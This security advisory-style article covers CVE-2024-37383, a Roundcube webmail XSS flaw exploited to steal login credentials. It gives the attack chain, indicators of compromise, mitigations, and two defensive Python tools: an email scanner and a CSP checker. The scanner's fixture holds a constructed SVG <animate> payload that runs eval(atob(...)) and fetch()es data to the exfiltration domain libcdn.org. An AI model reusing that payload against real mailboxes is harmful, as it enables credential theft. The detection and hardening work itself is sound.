Hackers Exploit Roundcube Webmail XSS Vulnerability to Steal Login Credentials

A security flaw in the Roundcube webmail software has been exploited by threat actors as part of a phishing attack aimed at stealing user credentials. According to Positive Technologies, the attack involved sending a seemingly empty email to a government organization in a Commonwealth of Independent States (CIS) country.

The email, sent in June 2024, concealed its payload in the message body: JavaScript embedded in the HTML markup and wrapped in eval(atob(…)), so that the Base64-encoded script is decoded and executed only when the message is rendered. The vulnerability it targets, CVE-2024-37383, is a stored cross-site scripting (XSS) flaw in Roundcube Webmail with a CVSS score of 6.1.

The flaw lies in Roundcube’s handling of SVG “animate” attributes: a crafted HTML email carries JavaScript past Roundcube’s HTML sanitizer, and the script runs in the victim’s browser as soon as the message is opened. The victim does not need to click a link, because the script executes when Roundcube renders the email.

This makes the vulnerability an ideal phishing vector. The attacker only needs the recipient to open a specially crafted email to load and execute arbitrary JavaScript inside the webmail session, which can then steal credentials or other sensitive information. The flaw was patched in May 2024 with the release of Roundcube versions 1.5.7 and 1.6.7.

In the final phase of the attack, the harvested username and password are exfiltrated to a remote server, “libcdn[.]org,” which is hosted on Cloudflare. The identity of the attackers remains unclear, but earlier Roundcube vulnerabilities have been exploited by groups such as APT28, Winter Vivern, and TAG-70.

Although Roundcube is not the most widely used webmail client, it is a recurring target, in part because it is commonly deployed by government agencies. A successful compromise can expose highly sensitive correspondence, which makes Roundcube attractive to both nation-state actors and criminal groups seeking intelligence or credentials.

Technical Details:

Vulnerability Details:

  • CVE ID: CVE-2024-37383
  • CVSS Score: 6.1 (Medium severity)
  • Vulnerability Type: Stored Cross-Site Scripting (XSS)
  • Attack Vector: A crafted HTML email; the injection point is SVG “animate” attributes, through which arbitrary JavaScript is smuggled into the rendered message.

Attack Chain:

  1. Vulnerability Exploitation: Attackers send a specially crafted email whose HTML body carries JavaScript inside SVG “animate” attributes that the vulnerable Roundcube versions fail to sanitize.
  2. Execution of JavaScript: When the victim opens the email in the Roundcube webmail client, the JavaScript is executed in their web browser.
  3. Credential Harvesting: The malicious script captures the user’s credentials (username and password).
  4. Exfiltration: The stolen credentials are sent to a remote server (“libcdn[.]org”) hosted on Cloudflare.

Affected Products:

  • Roundcube Webmail:
    • Vulnerable Versions: Releases before 1.5.7, and 1.6.x releases before 1.6.7.
    • Patched Versions: 1.5.7 and 1.6.7, both released in May 2024.

Organizations using these older versions of Roundcube should update to the patched versions to avoid exploitation of the CVE-2024-37383 vulnerability.

Impact:

  1. Credential Theft: Attackers can steal login credentials (username and password) by exploiting the stored XSS vulnerability. This can lead to unauthorized access to user accounts, enabling further malicious actions such as data exfiltration or privilege escalation.
  2. Sensitive Data Exposure: Government agencies and organizations using Roundcube may store sensitive information in emails. Successful exploitation could allow attackers to access and steal confidential data, including internal communications and classified information.
  3. Remote Code Execution (RCE): The vulnerability itself is XSS and runs only in the victim’s browser; on its own it does not give code execution on the mail server. Chained with another vulnerability, however, it could serve as the entry point for deeper compromise of the affected system.
  4. Widespread Organizational Damage: As Roundcube is used in various government agencies, successful attacks could lead to breaches affecting national security, with attackers gaining access to classified documents or internal systems.
  5. Phishing Campaigns: Stolen credentials could be used to launch spear-phishing campaigns against other users or organizations, extending the impact of the attack and leading to broader compromise.
  6. Reputation and Trust Damage: Organizations affected by this attack may suffer reputational harm if sensitive data is leaked, impacting trust among stakeholders and potentially leading to legal or regulatory consequences.

Indicators of Compromise (IoCs):

1. Malicious Domain:

Domain: libcdn[.]org

Hosted on Cloudflare; used for credential exfiltration in this attack.

2. Email Indicators:

Email Body: Emails that render as empty or blank yet carry HTML markup with encoded JavaScript, typically a Base64 string decoded and run via eval(atob(…)).

Attachment Behavior: Emails carrying an attachment that the webmail client does not display.

Specially Crafted SVG: HTML message bodies containing SVG “animate” elements or attributes. The XSS is triggered by inline SVG markup in the rendered email, so inspect the HTML part and not only attachments.

3. Network Traffic:

Outbound Connections: Connections from user workstations to libcdn[.]org or other unknown external servers. The exfiltration request is issued by the victim’s browser, not by the Roundcube server, so look at client egress, proxy and DNS logs as well as server logs.

Anomalous HTTP Requests: Unexpected HTTP requests from webmail sessions to external domains immediately after a message is opened.

4. JavaScript Patterns:

Obfuscated JavaScript: Scripts within the email that decode Base64 strings with atob(), which may execute malicious code upon rendering.

eval() Usage: Embedded use of eval() in email content, commonly seen in exploitation attempts; in this campaign the two were combined as eval(atob(…)).

5. Log Analysis:

Login Attempts: Unusual login activity or failed login attempts following the opening of malicious emails.

User Agent Changes: Changes in user-agent strings or login behavior immediately after exposure to the malicious email, which may indicate reuse of the stolen credentials.

6. Suspicious File Hashes:

Hashes of any suspicious email attachments or SVG files identified as part of the attack can serve as IoCs. Consider submitting samples to antivirus databases or security vendors for hash matching.
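As an added example (not code from the article or from Roundcube), the following Python script triages raw messages for the indicators listed above. It parses the MIME structure, looks in HTML parts for <animate> elements, eval(atob(...)) wrappers and javascript: attribute values, flags bodies that render with no visible text, lists attachments, and decodes Base64 blobs to find the exfiltration domain hidden inside them. The two sample messages, the decoy attachment name and the script they carry are constructed for this example; they are not the attacker’s payload.

```python
"""Triage raw RFC 822 messages for the indicators listed above: an HTML body
with no visible text, inline SVG <animate> markup, eval(atob(...)) wrappers,
javascript: URLs in attribute values, and the exfiltration domain (also
searched for inside Base64 blobs, where the encoding hides it)."""
import base64
import binascii
import email
import re
from email import policy

# Exfiltration domain named in the report; defanged in the text, re-fanged here for matching.
EXFIL_DOMAINS = ("libcdn.org",)

ANIMATE_RE = re.compile(r"<animate\b[^>]*>", re.IGNORECASE)
EVAL_ATOB_RE = re.compile(
    r"""eval\s*\(\s*atob\s*\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)\s*\)""", re.IGNORECASE)
# Any attribute whose value is a javascript: URL (href, values, to, from, ...).
SCRIPT_URL_RE = re.compile(r"""=\s*["']?\s*javascript:""", re.IGNORECASE)
# Base64 runs long enough to carry a script; decoded and searched for the domain.
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
TAG_RE = re.compile(r"<[^>]+>")


def decode_b64(blob: str) -> str:
    """Best-effort Base64 decode (tolerates missing padding); '' on failure."""
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4))
    except (binascii.Error, ValueError):
        return ""
    return raw.decode("utf-8", "replace")


def scan_html(html: str):
    """Return (reasons, domains) found in one HTML body."""
    reasons, domains = [], set()
    animate = ANIMATE_RE.findall(html)
    if animate:
        reasons.append(f"{len(animate)} <animate> element(s) in HTML body")
    decoded = [decode_b64(m.group(1)) for m in EVAL_ATOB_RE.finditer(html)]
    if decoded:
        reasons.append(f"{len(decoded)} eval(atob(...)) wrapper(s)")
    if SCRIPT_URL_RE.search(html):
        reasons.append("attribute value is a javascript: URL")
    if not TAG_RE.sub(" ", html).strip():
        reasons.append("HTML body has markup but no visible text")
    # Look for the domain in the raw markup, in eval(atob()) payloads and in any
    # bare Base64 run. Long tokens in legitimate mail decode to garbage, which is
    # harmless: they only count when the decoded text contains a listed domain.
    haystacks = [html, *decoded, *(decode_b64(m.group(0)) for m in B64_RE.finditer(html))]
    for text in haystacks:
        for domain in EXFIL_DOMAINS:
            if domain in text:
                domains.add(domain)
    if domains:
        reasons.append("exfiltration domain referenced: " + ", ".join(sorted(domains)))
    return reasons, domains


def scan_message(raw: bytes) -> dict:
    """Parse one raw message and return a triage verdict."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    verdict = {"subject": str(msg["subject"] or ""), "reasons": [], "domains": set(), "attachments": []}
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            reasons, domains = scan_html(part.get_content())
            verdict["reasons"].extend(reasons)
            verdict["domains"].update(domains)
        elif part.get_content_disposition() == "attachment":
            verdict["attachments"].append(part.get_filename() or "<unnamed>")
    verdict["suspicious"] = bool(verdict["reasons"])
    verdict["domains"] = sorted(verdict["domains"])
    return verdict


# Constructed stand-in for a decoded exfiltration script (not the real payload).
_FAKE_SCRIPT = 'fetch("https://libcdn.org/c", {method: "POST", body: location.href})'
_FAKE_B64 = base64.b64encode(_FAKE_SCRIPT.encode()).decode()

# Constructed message in the shape described above: an apparently empty HTML
# body whose only content is SVG <animate> markup, plus a decoy attachment.
SUSPICIOUS_EMAIL = (
    "From: sender@example.test\r\n"
    "To: victim@example.test\r\n"
    "MIME-Version: 1.0\r\n"
    'Content-Type: multipart/mixed; boundary="b1"\r\n'
    "\r\n"
    "--b1\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "\r\n"
    '<html><body><svg><animate attributeName="href" '
    f"values=\"javascript:eval(atob('{_FAKE_B64}'))\"/></svg></body></html>\r\n"
    "--b1\r\n"
    "Content-Type: application/octet-stream\r\n"
    'Content-Disposition: attachment; filename="decoy.doc"\r\n'
    "Content-Transfer-Encoding: base64\r\n"
    "\r\n"
    "AAAA\r\n"
    "--b1--\r\n"
).encode()

# Constructed benign message used as a negative control.
BENIGN_EMAIL = (
    "From: newsletter@example.test\r\n"
    "To: victim@example.test\r\n"
    "Subject: Weekly update\r\n"
    "MIME-Version: 1.0\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "\r\n"
    "<html><body><p>Hello, here is this week's summary.</p></body></html>\r\n"
).encode()

if __name__ == "__main__":
    for raw in (SUSPICIOUS_EMAIL, BENIGN_EMAIL):
        print(scan_message(raw))
```

Feed each message’s raw bytes (for example from a Maildir or an IMAP fetch) to scan_message() and act on the reasons list; a body that is blank to the eye but contains an <animate> element is the pattern this campaign relied on.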

Recommendations:

  1. Update Roundcube to Latest Version:

Immediately upgrade to Roundcube 1.5.7 or 1.6.7 (or later); these releases contain the fix for CVE-2024-37383. Confirm the installed version after the upgrade rather than relying on the package name alone.

  2. Monitor and Block Malicious Domains:

Block traffic to known malicious domains such as “libcdn[.]org” to prevent exfiltration of credentials. Because the exfiltration request is sent by the user’s browser, the block must be enforced on client egress (DNS, proxy, firewall), not only on the mail server.

Regularly update blocklists to stay ahead of emerging threats.

  3. Implement Web Application Firewalls (WAF):

A WAF in front of Roundcube can inspect incoming HTTP requests for known attack patterns, but it has two blind spots here: the malicious email arrives over SMTP and sits in the mailbox before it is ever rendered, and the exfiltration request goes from the victim’s browser straight to the attacker’s server. Treat a WAF as defence in depth, not as a substitute for patching.

  4. Enable Content Security Policies (CSPs):

Enforce CSP headers on the webmail site to limit what injected JavaScript can do. Restricting connect-src, img-src and form-action to the webmail origin cuts off the usual exfiltration channels and is low risk to deploy. Removing 'unsafe-inline' from script-src would stop the injected script from running at all, but Roundcube’s own pages use inline scripts, so test that change before enforcing it. No CSP directive prevents a script from navigating the page itself to an attacker URL, so CSP complements, rather than replaces, domain blocking.

  5. Conduct Regular Security Audits:

Perform regular security audits of webmail services and associated web applications to identify potential vulnerabilities.

Review email configurations and access logs to detect suspicious behavior or unauthorized access attempts.

  6. Educate Users on Phishing Risks:

Train users to recognize phishing emails and suspicious attachments, and to report empty or unexpected messages even from trusted senders. This exploit needs no click, so awareness limits the damage but cannot stop the script from running; only patching does that.

  7. Enable Two-Factor Authentication (2FA):

Require a second factor for all user accounts so that stolen credentials alone do not grant access. Roundcube’s core has no built-in second factor; enforce it through a plugin or an identity provider in front of the webmail login. Keep in mind that the injected script already runs inside the victim’s authenticated session, so 2FA limits later reuse of the stolen password rather than actions taken during that session.

  8. Monitor for Suspicious Activity:

Regularly review login attempts for unusual access patterns, such as logins from unexpected geographic locations or multiple failed login attempts.

Use intrusion detection systems (IDS) to detect anomalies in web traffic.

  9. Backup Critical Data:

Ensure critical data is regularly backed up to protect against data loss or tampering following a breach. Regular backups allow services to be restored quickly after a successful attack.
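The CSP recommendation above is easier to reason about with a checker. This is an added example, not code from the article or from Roundcube: given a Content-Security-Policy header, it reports which exfiltration channels an injected script could still use to reach a target host, applying the fallback rules of the specification (directives inherit from default-src, except form-action, which has no fallback). The three policies, the target host libcdn.org and the webmail origin mail.example.test are constructed for illustration and are not taken from any Roundcube release; port matching is deliberately ignored.

```python
"""Report which exfiltration channels a Content-Security-Policy leaves open
to an injected script.  True in the result means the policy does NOT stop
that channel."""
import re

# Host-based channel -> governing directive.  connect-src and img-src fall
# back to default-src when absent; form-action never does.
HOST_CHANNELS = {
    "fetch / XMLHttpRequest / sendBeacon": "connect-src",
    "image beacon (new Image().src = ...)": "img-src",
    "form submission to a foreign action": "form-action",
}
NO_FALLBACK = {"form-action"}
# host-source: [scheme://][*.]host[:port][/path]
HOST_SRC_RE = re.compile(
    r"^(?:(?P<scheme>[a-z][a-z0-9+.-]*)://)?(?P<wild>\*\.)?(?P<host>[a-z0-9.-]+)"
    r"(?::(?:\d+|\*))?(?:/.*)?$"
)


def parse_csp(header: str) -> dict:
    """Split a CSP header into {directive: [source tokens]}, lower-cased."""
    policy = {}
    for directive in header.split(";"):
        tokens = directive.lower().split()
        if tokens:
            policy.setdefault(tokens[0], tokens[1:])  # duplicates are ignored, as in browsers
    return policy


def effective_sources(policy: dict, directive: str):
    """Source list that applies to `directive`, or None when it is unrestricted."""
    if directive in policy:
        return policy[directive]
    if directive in NO_FALLBACK:
        return None
    return policy.get("default-src")


def host_allowed(sources, host: str, origin_host: str, scheme: str = "https") -> bool:
    """Would a request to scheme://host be permitted by this source list?"""
    if sources is None:
        return True
    for src in sources:
        if src == "*":
            return True
        if src == "'self'":
            if host == origin_host:
                return True
            continue
        if src.startswith("'"):       # 'none', 'unsafe-inline', nonces, hashes: no host grant
            continue
        if src.endswith(":"):         # scheme-source such as https: or data:
            if src == scheme + ":":
                return True
            continue
        m = HOST_SRC_RE.match(src)
        if not m:
            continue
        if m["scheme"] and m["scheme"] != scheme:
            continue
        if host == m["host"] or (m["wild"] and host.endswith("." + m["host"])):
            return True
    return False


def open_channels(header: str, target_host: str, origin_host: str) -> dict:
    """Map each channel an injected script could use to whether the policy allows it."""
    policy = parse_csp(header)
    script = effective_sources(policy, "script-src")
    result = {
        # javascript: URLs and injected <script> are inline script under CSP.
        "inline script / javascript: URL": script is None or "'unsafe-inline'" in script,
        "eval() on a decoded string": script is None or "'unsafe-eval'" in script,
    }
    for channel, directive in HOST_CHANNELS.items():
        result[channel] = host_allowed(effective_sources(policy, directive), target_host, origin_host)
    return result


# Constructed policies for illustration (assumed; not a Roundcube default).
PERMISSIVE = "default-src * 'unsafe-inline' 'unsafe-eval'"
# Keeps 'unsafe-inline' but pins every request channel to the webmail origin.
HARDENED = ("default-src 'self'; script-src 'self' 'unsafe-inline'; "
            "connect-src 'self'; img-src 'self' data:; form-action 'self'")
# Common mistake: no form-action, which does not inherit from default-src.
NO_FORM_ACTION = "default-src 'self'; script-src 'self' 'unsafe-inline'"

if __name__ == "__main__":
    for name, header in (("permissive", PERMISSIVE), ("hardened", HARDENED),
                         ("no form-action", NO_FORM_ACTION)):
        print(name, open_channels(header, "libcdn.org", "mail.example.test"))
```

The hardened policy still reports inline script as open, because Roundcube’s own pages use inline scripts and most deployments keep 'unsafe-inline'; it is the one directive that would neutralise the injection outright, so test whether your installation works without it. The NO_FORM_ACTION case shows why form-action must be set explicitly: with only default-src, a script can still post the harvested credentials through an injected form.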